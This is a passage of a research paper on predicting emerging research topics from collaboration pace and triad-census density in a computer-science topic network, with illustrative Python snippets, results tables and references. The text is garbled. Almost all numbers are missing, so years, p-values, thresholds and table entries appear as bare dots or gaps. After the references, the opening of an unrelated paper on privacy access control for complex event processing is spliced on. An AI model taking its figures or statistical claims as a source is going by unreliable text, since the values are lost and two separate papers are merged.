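    return link_weight.get((x, y), link_weight.get((y, x), 0))

def p(y, given_x):
    """P(y|x): share of the publications of topic x that also mention y."""
    return cooc(given_x, y) / node_weight[given_x] if node_weight[given_x] else 0.0

def collaboration_index(clique):
    """mean over the three links of mean(P(a|b), P(b|a))."""
    pair_strengths = [(p(a, b) + p(b, a)) / 2 for a, b in combinations(clique, 2)]
    return sum(pair_strengths) / len(pair_strengths)

print(collaboration_index(("world wide web", "information retrieval", "search engines")))
```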
the advantage of using conditional probabilities instead of the number of co-occurrences is that the value µ_{x-y} is normalised with respect to the number of publications associated with each topic. finally, µ is computed as the mean of the strengths of collaboration of the three links in a 3-clique. this solution was adopted after testing alternative approaches during the preliminary evaluation, as discussed in the results section. the evolution of the 3-clique collaboration pace can be represented as a timeline of values in which each year is associated with its collaboration pace, as in eq. ( ). we assess the increase of the collaboration pace in the period under analysis by computing the slope of the linear regression of these values.

$µ^{clique-i}_{time} = [µ(year-5), µ(year-4), µ(year-3), µ(year-2), µ(year-1)]$. ( )

initially, we tried to determine the increase in the collaboration pace exhibited by a clique by simply taking the difference between the first and last values of the timeline. however, this method ignores the other values in the timeline and can thus neglect important information. for this reason, we applied instead the linear interpolation method on the five measures, using the least-squares approximation to determine the linear regression of the time series $f(x) = a \cdot x + b$. the slope a is then used to assess the increase of collaboration in a clique. when a is positive, the degree of collaboration between the topics in the clique is increasing over time, while, when it is negative, the number and intensity of collaborations are decreasing. finally, the collaboration pace of each sub-graph is measured by computing the mean of all slopes associated with its 3-cliques. to summarize, for each input topic we select a subgraph of related topics in the five years preceding the year of debut (or of analysis for topics in the control group). we then extract the 3-cliques and associate each of them with a vector representing the evolution of their pace of collaboration. the trend of each clique is computed as the angular coefficient of the linear regression of these values. finally, the increase in the pace of collaboration of a subgraph is obtained by averaging these values.

triad-based method
the triad-based method employs the triad census (davis & leinhardt, ) to measure the change of topology and the increasing density of the subgraphs during the five-year period. the triad census of an undirected graph, also referred to as global 3-profiles, is a four-dimensional vector representing the frequencies of the four isomorphism classes of triads, as shown in fig. .
figure: the four isomorphism classes of triads (empty, one edge, two-star, triangle). the triad census counts the frequencies h_i of each class in the input graph.
table: frequencies of h_i obtained by performing the triad census on the debutant topic "artificial bee colonies", with one row per yearly sub-graph $G^{topic}_{year-1}$ … $G^{topic}_{year-5}$ and one column per triad class.
the triad census summarises structural information in networks and is useful to analyse structural properties in social networks. it has been applied to several scenarios, such as identifying spam (kamaliha et al., ; o'callaghan et al., ), comparing networks (pržulj, ), and analysing social networks (faust, ; ugander, backstrom & kleinberg, ).
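before going into the triad census in detail, here is a small illustrative sketch (an assumed implementation, not the authors' code) of the step that concludes the clique-based method above: turning a five-year timeline of collaboration indexes into a trend via a least-squares slope and averaging the slopes over the cliques of a subgraph.

```python
# minimal sketch: pace of collaboration as the mean least-squares slope (illustrative only)
import numpy as np

def clique_slope(timeline):
    """slope of the linear regression fitted to a per-year series of µ values."""
    years = np.arange(len(timeline))            # year-5 ... year-1 mapped to 0..4
    slope, _intercept = np.polyfit(years, timeline, deg=1)
    return slope

def subgraph_pace(clique_timelines):
    """average slope over all 3-cliques of the subgraph under analysis."""
    return float(np.mean([clique_slope(t) for t in clique_timelines]))

# hypothetical µ timelines for two 3-cliques over five years
timelines = [
    [0.010, 0.012, 0.015, 0.021, 0.030],   # collaboration clearly accelerating
    [0.020, 0.019, 0.021, 0.020, 0.022],   # roughly flat
]
print(subgraph_pace(timelines))
```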
in this study, we use the triad census to describe all the sub-graphs associated to an input topic in terms of the frequencies of the classes h_i (see fig. ) and we then evaluate how the frequencies of empties, one edges, two-stars and triangles change in time. figure illustrates the four classes of triads for an undirected graph in the case of topic networks. an increase in the number of triangles suggests the appearance of new collaboration clusters among previously distant topics. in contrast with the 3-cliques approach, the triad census does not consider the weight of the links, but only their existence. hence, it is useful to assess how the inclusion of links with different strengths affects the analysis. to this end, we performed three experiments in which we considered only links associated with more than , and topic co-occurrences. we initially perform the triad census over the five graphs associated to each input topic. for example, table shows the results of the triad census over the five sub-graphs associated with the debutant topic artificial bee colonies. next, we check whether the co-occurrence graph is becoming denser by analysing the change of the frequencies associated with h_i (see fig. ). we first calculate the percentage growth of each h_i (eq. ( )) and then compute their weighted summation (eq. ( )). we label the resulting metric the growth index. we empirically tested other solutions for aggregating the various contributions (e.g., considering only one class, summing the values, weighting the sum in a variety of ways) and found that this definition of the growth index provides the best discrimination between the two classes of graphs.

$\%growth_{H_i} = \frac{H_i^{year-1} - H_i^{year-5}}{H_i^{year-5}} \times 100$ ( )

$growth\ index_{topic} = \sum_i i \cdot \%growth_{H_i}$. ( )

the growth index takes into account the contributions from three of the triad classes. although the number of triangles can by itself be a fair indicator of the density, previous studies showed that all four classes of triads are useful for computing network properties, including transitivity, intransitivity and density (faust, ; holland & leinhardt, ). taking into consideration only the number of triangles might fail to detect some subtler cases, characterized for example by a contemporary increase of one class and decrease of another.
figure: development in time of the frequencies of h_i in the network related to the emergence of "artificial bee colonies".
to summarize, the triad-based method receives the same input as the clique-based method. for each of the five subgraphs associated to a topic, we perform the triad census, obtaining the different frequencies h_i in different years. we then analyse them diachronically to quantify the increase in density.
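the following is a minimal, illustrative sketch (an assumed implementation, not the authors' code) of the triad census of an undirected graph and of a growth index in the spirit of the formulas above; the class weighting used in the summation is an assumption.

```python
# minimal sketch: triad census of an undirected graph and a growth index (illustrative only)
from itertools import combinations
import networkx as nx

def triad_census(g):
    """count the four undirected triad classes: empty, one edge, two-star, triangle."""
    counts = [0, 0, 0, 0]
    for trio in combinations(g.nodes, 3):
        edges = sum(1 for a, b in combinations(trio, 2) if g.has_edge(a, b))
        counts[edges] += 1          # 0, 1, 2 or 3 edges among the three nodes
    return counts

def growth_index(census_first_year, census_last_year, weights=(0, 1, 2, 3)):
    """weighted sum of the percentage growth of each triad class (weights assumed)."""
    total = 0.0
    for w, first, last in zip(weights, census_first_year, census_last_year):
        if first > 0:
            total += w * (last - first) * 100.0 / first
    return total

g_first, g_last = nx.Graph(), nx.Graph()
g_first.add_edges_from([("a", "b"), ("b", "c")])
g_last.add_edges_from([("a", "b"), ("b", "c"), ("a", "c"), ("c", "d")])
g_first.add_nodes_from(g_last.nodes)   # keep the same node set in both years

print(triad_census(g_first), triad_census(g_last))
print(growth_index(triad_census(g_first), triad_census(g_last)))
```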
results
in this section we report the results obtained by analysing the debutant and control groups using the previously discussed methods. we will describe:
• the preliminary evaluation performed on a reduced dataset for assessing the metrics used in the clique-based method;
• the full study using the clique-based method;
• the full study using the triad-based method.

preliminary evaluation with alternative clique-based methods
we conducted a preliminary evaluation aiming at choosing the most effective clique-based method for assessing the pace of collaboration. this test focused on the subgraphs of the most co-occurring topics associated with the topics semantic web (debuting in ) and cloud computing ( ) versus a control group of subgraphs associated to a group of non-debutant topics. we tested on this dataset two techniques to compute the weight of a clique (harmonic mean and arithmetic mean) and two methods to evaluate its trend (the difference between the first and the last values, and linear regression). hence, we evaluated the following four approaches:
• am-n, which uses the arithmetic mean and the difference between first and last value;
• am-cf, which uses the arithmetic mean and the linear regression coefficient;
• hm-n, which uses the harmonic mean and the difference between first and last value;
• hm-cf, which uses the harmonic mean and the linear regression coefficient.
figure: overall directions of the sub-graphs related to input topics in both debutant and control groups with all four approaches.
figure illustrates the average pace of collaboration for the sub-graphs associated with each topic according to these methods and the range of their values (thin vertical line). the results support the initial hypothesis: the pace of collaboration of the cliques within the portion of the network associated with the emergence of new topics is positive and higher than the one of the control group. interestingly, the pace of collaboration of the control group is also slightly positive. further analysis revealed that this behaviour is probably caused by the fact that the topic network becomes denser and noisier in time. figure confirms this intuition, illustrating the fast growth of the number of publications per year in the dataset during the time window – .
figure: number of papers each year in the period – in the dataset under analysis.
the approaches based on the simple difference (am-n and hm-n) exhibit the larger gaps between the two groups in terms of average pace of collaboration. however, the ranges of values overlap, making it harder to assess if a certain sub-group is incubating a novel topic. the same applies to am-cf. hm-cf performs better and, even if the values slightly overlap when averaging the pace over different years, they do not when considering single years. indeed, analysing the two ranges separately in and (see fig. ), we can see that the overall collaboration paces of the debutant topics (db) are always significantly higher than those of the control group (ndb). with the null hypothesis "the differences in the pace of collaboration between the debutant topics and topics in the control group result purely from chance", we ran student's t-test on the sample of data provided by the hm-cf approach, to verify whether the two groups belong to different populations. (we consider p < . as a conventional statistical representation indicating an extremely high statistical significance, i.e., much stronger than the conventional . threshold for claiming significance; it includes all mathematical outcomes below . , which are essentially equivalent in assessing excellent significance.)
figure: overall directions of the sub-graphs related to input topics in both debutant and control groups in the hm-cf approach.
the test yielded p < . , which allowed us to reject the null hypothesis that the differences between the two distributions were due to random variations. based on this result, we could further confirm that the hm-cf approach performs better compared to the other approaches. for this reason, we selected the combination of harmonic mean and linear regression as the approach for the full study using the clique-based method. the results of hm-cf give interesting insights on the creation of some well-known research topics. tables and list the cliques that exhibited a steeper slope for semantic web and cloud computing. we can see that semantic web was anticipated in the – timeframe by a significant increase in collaboration of the world wide web area with topics such as information retrieval, artificial intelligence, and knowledge based systems. this is consistent with the initial vision of the semantic web as defined in the seminal work of berners-lee, hendler & lassila ( ). similarly, cloud computing was anticipated by an increase in the collaboration between topics such as grid computing, web services, distributed computer systems and internet. this suggests that our approach can be used both for forecasting the emergence of new topics in distinct subsections of the topic network and also for identifying the topics that gave rise to a research area.
table: ranking of the cliques with the highest slope value for "semantic web".
topic 1 | topic 2 | topic 3 | slope
world wide web | information retrieval | search engines | .
world wide web | user interfaces | artificial intelligence | .
world wide web | artificial intelligence | knowledge representation | .
world wide web | knowledge based systems | artificial intelligence | .
world wide web | information retrieval | knowledge representation | .
table: ranking of the cliques with the highest slope value for "cloud computing".
topic 1 | topic 2 | topic 3 | slope
grid computing | distributed computer systems | web services | .
web services | information management | information technology | .
grid computing | distributed computer systems | quality of service | .
internet | quality of service | web services | .
web services | distributed computer systems | information management | .

clique-based method study
we applied the clique-based method on the subgraphs associated to topics in the treatment and control groups. figure reports the results obtained by using subgraphs composed of the , and topics with the highest co-occurrence. each bar shows the mean value of the average pace of collaboration for the debutant (db) and non-debutant (ndb) topics. as before, the pace computed in the portion of the network related to debutant topics is higher than the corresponding pace for the control group. since the pace of collaboration shows significant changes within the period considered, we studied its behaviour across the – interval. figures a–c show the average yearly collaboration pace when considering the , and most co-occurring topics. in all cases the collaboration pace for the debutant topics is higher than the one for the control group. we can also notice that in the last five years the overall pace of collaboration suffered a fall for both debutant and non-debutant topics. this may be due to the fact that the topic network became denser and noisier in the final years of the interval. moreover, the most recent debutant topics often have an underdeveloped network of co-occurrences, which may result in a suboptimal selection of the group of topics to be analysed in the previous years. therefore, simply selecting the most co-occurring topics may not allow us to highlight the real dynamics preceding the creation of a new topic.
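as an illustration of the statistical comparison used in these experiments (an assumed implementation with made-up numbers, not the study's data), the two distributions of per-subgraph collaboration paces can be compared with an independent two-sample student's t-test from scipy.

```python
# minimal sketch: comparing debutant vs control pace distributions (illustrative only)
from scipy import stats

# hypothetical average collaboration paces, one value per analysed subgraph
debutant_paces = [0.012, 0.018, 0.009, 0.022, 0.015, 0.019]
control_paces = [0.004, 0.006, 0.001, 0.007, 0.003, 0.005]

t_statistic, p_value = stats.ttest_ind(debutant_paces, control_paces)
print(f"t = {t_statistic:.3f}, p = {p_value:.4f}")

# a small p-value would lead us to reject the null hypothesis that the
# differences between the two groups result purely from chance
```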
figure: average collaboration pace of the sub-graphs associated to the treatment (db) and control group (ndb), when selecting the , and most co-occurring topics. the thin vertical lines represent the ranges of values.
table compares the collaboration pace of debutant topics with the collaboration pace of the control group in the same year. we can see how the appearance of a good number of well-known topics, which emerged in the last decade, was anticipated by the dynamics of the topic network. the student's t-test confirmed that the debutant and established topics do not belong to the same population (p < . ). the results of the t-test also suggest that the experiment involving the most co-occurring topics, represented in fig. c, provides a better discrimination of debutant topics from non-debutant ones. for the sake of completeness, in table we report the p-values yielded by each experiment. in conclusion, the results confirm that the portions of the topic network in which a novel topic will eventually appear exhibit a measurable fingerprint, in terms of increased collaboration pace, well before the topic is recognized and labelled by researchers.

triad-based method study
we applied the triad-based method on the subgraphs composed of the most co-occurring topics, since this configuration provided the best outcomes in previous tests. we performed multiple tests by filtering links associated with less than , and co-occurrences, to understand how collaboration strength influences the outcome. figure a reports the average value of the growth indexes when discarding links with less than co-occurrences. the approach allows us to discriminate well the portions of the network related to debutant topics from the ones related to the control group. in particular, the density of the network associated with the debutant topics is always higher than its counterpart. figures b and c report the results obtained by removing links with less than and co-occurrences. as in the previous experiment, we adopted the student's t-test to understand which of the three tests could provide a better discrimination between the two classes of topics.
figure: average collaboration pace per year of the sub-graphs related to input topics in both debutant and control groups considering their (a), (b) and (c) most co-occurring topics. the year refers to the year of analysis of each topic.
table: collaboration pace of the sub-graphs associated to selected debutant topics versus the average collaboration pace of the control group in the same year of debut.
topic (year of debut) | collaboration pace | standard collaboration pace
service discovery | . | .
ontology engineering | . | .
ontology alignment | . | .
service-oriented architecture | . | .
smart power grids | . | .
sentiment analysis | . | .
semantic web services | . | .
linked data | . | .
semantic web technology | . | .
vehicular ad hoc networks | . | .
mobile ad-hoc networks | . | .
p2p network | . | .
location based services | . | .
service oriented computing | . | .
ambient intelligence | . | .
social tagging | . | .
community detection | . | .
cloud computing | . | .
user-generated content | . | .
information retrieval technology | . | .
web 2.0 | . | .
ambient assisted living | . | .
internet of things | . | .
table: p-values obtained performing the student's t-test over the distributions of both debutant and control groups considering their , and most co-occurring topics. the best result is bolded.
experiment | p-value | associated chart
most co-occurring topics | . ·10^− | fig. a
most co-occurring topics | . ·10^− | fig. b
most co-occurring topics | . ·10^− | fig. c
the results of the t-test suggest that the experiment in which we discard links with less than three co-occurrences provides a better discrimination of debutant topics from non-debutant ones. this suggests that considering weak connections is more beneficial for discriminating the two groups. the peak is caused by the debut of a number of topics associated with particularly strong underlying dynamics, such as linked data, pairing-based cryptography, microgrid and privacy preservation. table reports as an example the triad census performed over the subgraph associated with the topic semantic web technologies (swt), debuting in .
table: results of the triad census performed on the network associated with the debutant topic "semantic web technology", removing links associated with less than (left), (right) and (bottom) publications; one row per yearly sub-graph and one column per triad class (empty, one edge, two-star, triangle) in each setting.
we can see an increase in the number of triangles and two-stars, mirroring the increasing density of the topic network. again, this phenomenon is more evident when also using weak links. the percentage of growth of full triangles is % in the first test and then decreases to % and % in the other two settings. table shows a selection of debutant topics and their growth indexes compared with the growth index of the control group in the same year. comparing this table to table , we can see that the two methods used in this study reflect the same dynamics. with the null hypothesis "the differences in growth index between the debutant topics and topics in the control group result purely from chance", we ran student's t-test over the two distributions of growth indexes, for all three experiments. it yielded p < . for all the experiments. more details about the computed p-values for each experiment performed in this triad-based study can be found in table . figure shows, as an example, the distributions associated to the two groups of topics obtained in the first test.
hence, the results from this second experiment confirm our initial hypothesis too. in addition, as per table , the results from the t-test also suggest that the first experiment, which ignores the links associated with less than three publications, better discriminates the two populations.

discussion
we analysed the topic network with the aim of experimentally confirming our hypothesis that the emergence of new research areas is anticipated by an increased rate of interaction of pre-existing topics. we examined the pace of collaboration (via the clique-based method) and the change in topology (via the triad-based method) in portions of the network related to debutant topics, showing that it is possible to effectively discriminate areas of the topic graph associated with the future emergence of new topics. the first experiment showed that the subgraphs associated with the emergence of a new topic exhibit a significantly higher pace of collaboration than the control group of subgraphs associated with established topics. similarly, the second experiment showed that the graphs associated with a new topic display a significantly higher increase in their density than the control group. we can thus confirm that these two aspects can play a key role in the context of defining methods for detecting embryonic topics.
figure: average growth index per year of the sub-graphs related to the topics in both debutant and non-debutant groups, considering their most co-occurring topics and filtering links with less than (a), (b) and (c) publications.
table: growth indexes of sub-graphs associated to selected debutant topics versus the average growth index of the control group in the same year of debut (standard growth index).
topic (year of debut) | growth index | standard growth index
service discovery | . | .
ontology engineering | . | .
ontology alignment | . | .
service-oriented architecture | . | .
smart power grids | . | .
sentiment analysis | . | .
semantic web services | . | .
linked data | . | .
semantic web technology | . | .
vehicular ad hoc networks | . | .
mobile ad-hoc networks | . | .
p2p network | . | .
location based services | . | .
service oriented computing | . | .
ambient intelligence | . | .
social tagging | . | .
community detection | . | .
cloud computing | . | .
user-generated content | . | .
information retrieval technology | . | .
web 2.0 | . | .
ambient assisted living | . | .
internet of things | . | .
table: p-values obtained performing the student's t-test over the distributions of both debutant and control groups considering their most co-occurring topics and filtering links with less than , and publications. the best result is bolded.
experiment | p-value | associated chart
less than publications | . ·10^− | fig. a
less than publications | . ·10^− | fig. b
less than publications | . ·10^− | fig. c
interestingly, the ability of the two approaches in discriminating the debutant group from the control group varies with the time interval considered. it appears that the clique-based approach (see fig. ) discriminates them more effectively in the initial period, whereas the triad-based method (fig. ) seems to perform better in the central years ( – ).
we intend to investigate in future work whether these behaviours are associated with specific characteristics of the network. the results of these two experiments allow us to effectively discriminate specific sections of the topic graph and suggest that a significant increase in the rate of collaboration between existing topics provides a strong indicator for predicting the emergence of new research areas.
figure: distributions of growth indexes for both groups when filtering links associated with less than three publications.
even a simple threshold over the indexes introduced in this study allows us to discriminate well the subgraphs that will produce new research areas. for example, table reports the pace of collaboration obtained for both debutant and non-debutant topics in . here we can appreciate that a . threshold corresponding to a % precision is able to retrieve out of debutant topics. table displays other cases in which it is possible to obtain a very good recall when choosing a threshold corresponding to % precision. the application of this technique in a realistic setting would however require a scalable method for identifying promising topic graphs. while these results are satisfactory, our analysis presents some limitations, which we shall address in future work. in particular, we identified the relevant subgraph during the selection phase simply by selecting the n most co-occurring topics of the topic under analysis. this solution allows us to compare graphs of the same dimension, however it introduces two issues. first of all, it assumes that all topics derive from the same number of research areas, which is an obvious simplification. emerging topics may have a different nature, based on their origin, development patterns, interactions of pioneer researchers, and so on. therefore, each of them will be linked to a different number of established research areas. a manual analysis of the data suggests that using a constant number of co-occurring topics is one of the reasons why the overall pace of collaboration and growth index associated with the emergent topics are not much higher than the ones of the control group. when selecting too many co-occurring topics, we may include less significant research areas or, alternatively, research areas that started to collaborate with the topic in question only after its emergence. conversely, when selecting too few topics, the resulting graph may exclude some important ones.
table: list of topics, both debutant and non-debutant, with their pace of collaboration, analysed in the year .
topic | pace of collaboration | debutant/control
linked data | . | d
bilinear pairing | . | d
wimax | . | d
separation logic | . | d
phishing | . | d
micro grid | . | d
privacy preservation | . | d
vehicular ad hoc networks | . | d
mobile computing | . | c
electromagnetic dispersion | . | c
online learning | . | c
wavelet analysis | . | c
program interpreters | . | c
zigbee | . | d
natural sciences computing | . | c
knowledge discovery | . | c
fuzzy neural networks | . | c
three term control systems | . | c
table: precision and recall when choosing particular thresholds for distinguishing the classes of topics (one column per year and threshold; rows report recall and precision).
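to illustrate the simple thresholding discussed above (again an assumed implementation with made-up numbers, not the study's data), precision and recall for a given cut-off over the pace of collaboration can be computed as follows.

```python
# minimal sketch: precision/recall of a threshold over the pace of collaboration (illustrative only)

# hypothetical (pace, is_debutant) pairs for a set of analysed subgraphs
samples = [
    (0.021, True), (0.017, True), (0.006, True), (0.019, True),
    (0.004, False), (0.009, False), (0.003, False), (0.011, False),
]

def precision_recall(samples, threshold):
    predicted = [(pace >= threshold, is_debut) for pace, is_debut in samples]
    tp = sum(1 for pred, truth in predicted if pred and truth)
    fp = sum(1 for pred, truth in predicted if pred and not truth)
    fn = sum(1 for pred, truth in predicted if not pred and truth)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall

print(precision_recall(samples, threshold=0.015))
```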
a second limitation is that the selection phase performed in our study cannot be reused in a system capable of automatically detecting embryonic topics, since it requires knowledge of the set of topics with which the embryonic topic will co-occur in the future. however, this could be fixed by developing techniques that are able to select promising subgraphs according to their collaboration pace and density. for this purpose we are currently developing an approach that generates a topic graph in which (i) links are weighted according to the acceleration in the pace of collaboration between the two relevant topics and (ii) community detection algorithms are applied to select portions of the network characterized by an intense collaboration between topics. we expect that this solution will be able to detect at a very early stage that 'something' new is emerging in a certain area of the topic graph, even if it may not be able to accurately define the topic itself. it would thus allow relevant stakeholders to react very quickly to developments in the research landscape. the findings of this analysis also provide contributions of potential value to research in philosophy of science. firstly, they appear to support our hypothesis about the existence of an embryonic phase in the lifecycle of research topics. secondly, they bring new empirical evidence to fundamental theories in philosophy of science which are concerned with the evolution of scientific disciplines, e.g., herrera, roberts & gulbahce ( ), kuhn ( ), nowotny, scott & gibbons ( ), and sun et al. ( ). finally, they highlight that new topics tend to be born in an environment in which previously less interconnected research areas start to cross-fertilise and generate new ideas. this suggests that interdisciplinarity is one of the most significant forces that drives innovation forward, allowing researchers to integrate a diversity of expertise and perspectives, and yield new solutions and new scientific visions. hence the results of our analysis could be used to support policies that promote interdisciplinary research.

conclusions
we hypothesised the existence of an embryonic phase for research topics, in which, while they have not yet been consistently labelled or associated with a considerable number of publications, they can nonetheless be detected through an analysis of the dynamics of already existing topics. to confirm this hypothesis, we performed an experiment on debutant topics in computer science, which led to the analysis of a topic network comprising about , topics extracted from a sample of three million papers in the – time interval. the results confirm that the creation of novel topics is anticipated by a significant increase in the pace of collaboration and density of the portions of the network in which they will appear. these findings provide supporting evidence for the existence of an embryonic phase for research topics and can be built on to foster further research to develop new techniques for the detection of topics at this stage. they also bring new empirical evidence to theories in philosophy of science. finally, they suggest that an interdisciplinary environment provides a fertile ground for the creation of novel research topics. we now plan to exploit the dynamics discussed in this study to create a fully automatic approach for detecting embryonic topics.
we also intend to study and integrate additional dynamics involving other research entities, such as authors and venues. the aim is to produce a robust approach to be used by researchers and companies alike for gaining a better understanding of where research is heading.

additional information and declarations
funding
the phd studentship for angelo a. salatino is funded by springer. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: springer.
competing interests
the authors declare there are no competing interests.
author contributions
• angelo a. salatino conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• francesco osborne conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper.
• enrico motta wrote the paper, reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: open science framework: https://osf.io/bd ex/.

references
becher t, trowler p. . academic tribes and territories: intellectual enquiry and the culture of disciplines. new york: mcgraw-hill education (uk).
berners-lee t, hendler j, lassila o. . the semantic web. scientific american : – .
blei dm, lafferty jd. . correlated topic models. in: weiss y, schölkopf pb, platt jc, eds. advances in neural information processing systems, vol. , – .
blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research : – .
bolelli l, ertekin Ş, giles cl. . topic and trend detection in text collections using latent dirichlet allocation. in: proceedings of the th european conference on ir research on advances in information retrieval, ecir' . berlin, heidelberg: springer-verlag, – .
boyack kw, klavans r, börner k. . mapping the backbone of science. scientometrics : – .
cano basave ae, osborne f, salatino aa. . ontology forecasting in scientific literature: semantic concepts prediction based on innovation-adoption priors. in: knowledge engineering and knowledge management: th international conference, ekaw, bologna, italy, proceedings. new york: springer international publishing, – .
cataldi m, di caro l, schifanella c. . emerging topic detection on twitter based on temporal and social terms evaluation. in: proceedings of the tenth international workshop on multimedia data mining. acm.
chang j, blei dm. . hierarchical relational models for document networks. the annals of applied statistics ( ): – .
chavalarias d, cointet j-p. . phylomemetic patterns in science evolution—the rise and fall of scientific fields. plos one :e .
couvalis g. . the philosophy of science: science and objectivity. thousand oaks: sage.
davis ja, leinhardt s. . the structure of positive interpersonal relations in small groups. washington, d.c.: institute of education sciences.
decker sl, aleman-meza b, cameron d, arpinar ib. . detection of bursty and emerging trends towards identification of researchers at the early stage of trends. athens: university of georgia.
duvvuru a, kamarthi s, sultornsanee s. . undercovering research trends: network analysis of keywords in scholarly articles. in: computer science and software engineering (jcsse), international joint conference on. – .
duvvuru a, radhakrishnan s, more d, kamarthi s, sultornsanee s. . analyzing structural & temporal characteristics of keyword system in academic research articles. procedia computer science : – .
erten c, harding pj, kobourov sg, wampler k, yee g. . exploring the computing literature using temporal graph visualization. electronic imaging : – .
faust k. . a puzzle concerning triads in social networks: graph constraints and the triad census. social networks : – .
fusch pi, ness lr. . are we there yet? data saturation in qualitative research. the qualitative report ( ): – .
griffiths tl, jordan mi, tenenbaum jb, blei dm. . hierarchical topic models and the nested chinese restaurant process. in: thrun s, saul lk, schölkopf pb, eds. advances in neural information processing systems, vol. . cambridge: mit press, – .
gruhl d, guha r, liben-nowell d, tomkins a. . information diffusion through blogspace. in: proceedings of the th international conference on world wide web. – .
he q, chen b, pei j, qiu b, mitra p, giles l. . detecting topic evolution in scientific literature: how can citations help? in: proceedings of the th acm conference on information and knowledge management. new york: acm, – .
herrera m, roberts dc, gulbahce n. . mapping the evolution of scientific fields. plos one :e .
holland pw, leinhardt s. . local structure in social networks. sociological methodology : – .
jo y, lagoze c, giles cl. . detecting research topics via the correlation between graphs and texts. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – .
kamaliha e, riahi f, qazvinian v, adibi j. . characterizing network motifs to identify spam comments. in: ieee international conference on data mining workshops. piscataway: ieee, – .
kuhn ts. . the structure of scientific revolutions. chicago: university of chicago press.
larsen po, von ins m. . the rate of growth in scientific publication and the decline in coverage provided by science citation index. scientometrics : – .
leydesdorff l. . betweenness centrality as an indicator of the interdisciplinarity of scientific journals. journal of the american society for information science and technology : – .
luce rd, perry ad. . a method of matrix analysis of group structure. psychometrika : – .
lv ph, wang g-f, wan y, liu j, liu q, ma f-c. . bibliometric trend analysis on global graphene research. scientometrics : – .
mathioudakis m, koudas n. . twittermonitor: trend detection over the twitter stream. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – .
morinaga s, yamanishi k. . tracking dynamics of topic trends using a finite mixture model. in: proceedings of the tenth acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – .
newman me. . the structure of scientific collaboration networks. proceedings of the national academy of sciences of the united states of america : – .
nowotny h, scott pb, gibbons mt. . re-thinking science: knowledge and the public in an age of uncertainty. hoboken: john wiley & sons.
o'callaghan d, harrigan m, carthy j, cunningham p. . identifying discriminating network motifs in youtube spam. arxiv preprint.
oka m, abe h, kato k. . extracting topics from weblogs through frequency segments. in: proceedings of www annual workshop on the weblogging ecosystem: aggregation, analysis, and dynamics.
osborne f, motta e. . mining semantic relations between research areas. in: cudré-mauroux p, heflin j, sirin e, tudorache t, euzenat j, hauswirth m, xavier parreira j, hendler j, schreiber g, bernstein a, blomqvist e, eds. the semantic web—iswc. lecture notes in computer science. berlin, heidelberg: springer.
osborne f, motta e. . klink-2: integrating multiple web sources to generate semantic topic networks. in: arenas m, corcho o, simperl e, strohmaier m, d'aquin m, srinivas k, groth p, dumontier m, heflin j, thirunarayan k, staab s, eds. the semantic web—iswc. lecture notes in computer science. cham: springer.
osborne f, motta e, mulholland p. . exploring scholarly data with rexplore. in: the semantic web—iswc. berlin, heidelberg: springer.
osborne f, scavo g, motta e. . a hybrid semantic approach to building dynamic maps of research communities. in: janowicz k, schlobach s, lambrix p, hyvönen e, eds. knowledge engineering and knowledge management. ekaw. lecture notes in computer science. berlin, heidelberg: springer.
pham mc, klamma r, jarke m. . development of computer science disciplines: a social network analysis approach. social network analysis and mining : – .
pržulj n. . biological network comparison using graphlet degree distribution. bioinformatics :e –e .
rosen-zvi m, griffiths t, steyvers m, smyth p. . the author-topic model for authors and documents. in: proceedings of the th conference on uncertainty in artificial intelligence. arlington: auai press, – .
salatino a. . early detection and forecasting of research trends. in: iswc-dc the iswc doctoral consortium. available at http://ceur-ws.org/vol- /paper_ .pdf.
salatino aa, motta e. . detection of embryonic research topics by analysing semantic topic networks. in: workshop on semantics, analytics, visualisation: enhancing scholarly data (save-sd). cham: springer.
sun x, ding k, lin y. . mapping the evolution of scientific fields based on cross-field authors. journal of informetrics : – .
sun x, kaur j, milojević s, flammini a, menczer f. . social dynamics of science. scientific reports : .
tseng y-h, lin y-i, lee y-y, hung w-c, lee c-h. . a comparison of methods for detecting hot topics. scientometrics : – .
ugander j, backstrom l, kleinberg j. . subgraph frequencies: mapping the empirical and extremal geography of large graph collections. in: proceedings of the nd international conference on world wide web. international world wide web conferences steering committee, – .
wu y, venkatramanan s, chiu dm. . research collaboration and topic trends in computer science based on top active authors. peerj computer science :e .

international journal of advanced network, monitoring and controls, volume , no. . doi: . /ijanmc- -

a cep privacy security access control framework based on event attribute detecting tree

bo hong*, school of computer science and engineering, xi'an technological university, xi'an, china. e-mail: @qq.com
xin jing, school of computer science and engineering, xi'an technological university, xi'an, china

abstract—complex event processing (cep) technology is a research focus in the data stream processing area, and privacy protection is a key problem that still needs to be solved. in order to prevent illegal users from acquiring information via registered event patterns, this paper discusses the cep privacy security access control object in depth, formally defines four types of event attribute operators (completely read, partially read, access denied and quantity statistics), presents a privacy security protection engine that uses the event attribute detecting tree as its operating mechanism, and puts forward a new, feasible cep privacy security access control framework based on it. the experimental results show that the framework is able to perform efficient, role-based filtering of private information, so that cep detection results can be processed and delivered safely.

keywords—complex event processing; privacy security access control; event attribute detecting tree; event attribute operator; security protection engine

i. introduction
data stream processing is a very important and active area in modern database technology. cep technology [ ] has become a research focus in this field since its inception, as it is capable of integrating information from numerous distributed data sources and extracting valuable dynamic meaning from high-speed data streams in real time. cep technology is thoroughly changing the way the traditional information system subscribes to, distributes and uses data. it acts as a hub for information fusion and dissemination by decoupling information providers and recipients and playing the roles of information observer, analyst and decision maker. as the number of internet of things sensors and network-based applications surges, the volume of information to be processed is growing explosively, and cep technology is increasingly becoming an essential tool in many application fields. however, for most cep engines at present, the processing and output of complex events are open. that is to say, not only can legitimate applications use the cep engine to obtain valuable information, but illegal users are also able to acquire the information needed for their criminal behavior.
